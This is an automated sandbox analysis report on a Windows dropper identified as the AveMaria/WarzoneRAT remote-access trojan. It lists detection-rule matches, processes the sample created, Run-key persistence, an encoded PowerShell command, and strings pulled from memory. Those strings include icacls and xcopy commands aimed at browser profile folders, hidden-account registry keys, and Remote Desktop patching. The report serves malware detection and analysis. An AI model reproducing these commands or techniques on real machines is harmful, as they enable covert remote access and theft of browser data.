              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeCode function: 0_2_00BBA5A8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeCode function: 0_2_00BBD038
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04D4C258
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04D4C2E3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EAA5D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EAC030
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EA9271
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EABC30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EA6740
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EA62D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EAA278
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EABC30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EC9E80
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EC0620
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EC7B70
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581928376.000000000259B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.591838998.0000000007200000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameLrqcelzadlkdb.dll" vs SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.578114187.00000000003E8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeBinary or memory string: OriginalFilenameDjkblrrkcs.exe4 vs SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: Mqombsglp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeJump to behavior
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-Date
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig/release
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA==
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig/renew
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-Date
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig/release
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA==
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig/renew
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeFile created: C:\Users\user\AppData\Roaming\MeiilnstlzJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhdrfzpc.o2h.ps1Jump to behavior
              Source: classification engineClassification label: mal100.troj.evad.winEXE@17/8@6/2
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:488:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_01
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic file information: File size 1056256 > 1048576
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x101400
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, u0005.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: Mqombsglp.exe.0.dr, u0005.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.0.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.150000.0.unpack, u0005.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EA6E08 push eax; ret
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EA6DF2 push eax; ret
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07EC4ED1 push eax; mov dword ptr [esp], ecx
              Source: initial sampleStatic PE information: section name: .text entropy: 7.999494429591008
              Source: initial sampleStatic PE information: section name: .text entropy: 7.999494429591008

              Persistence and Installation Behavior

              barindex
              Uses ipconfig to lookup or modify the Windows network settings
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeFile created: C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exeJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MqombsglpJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MqombsglpJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Contains functionality to hide user accounts
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOX
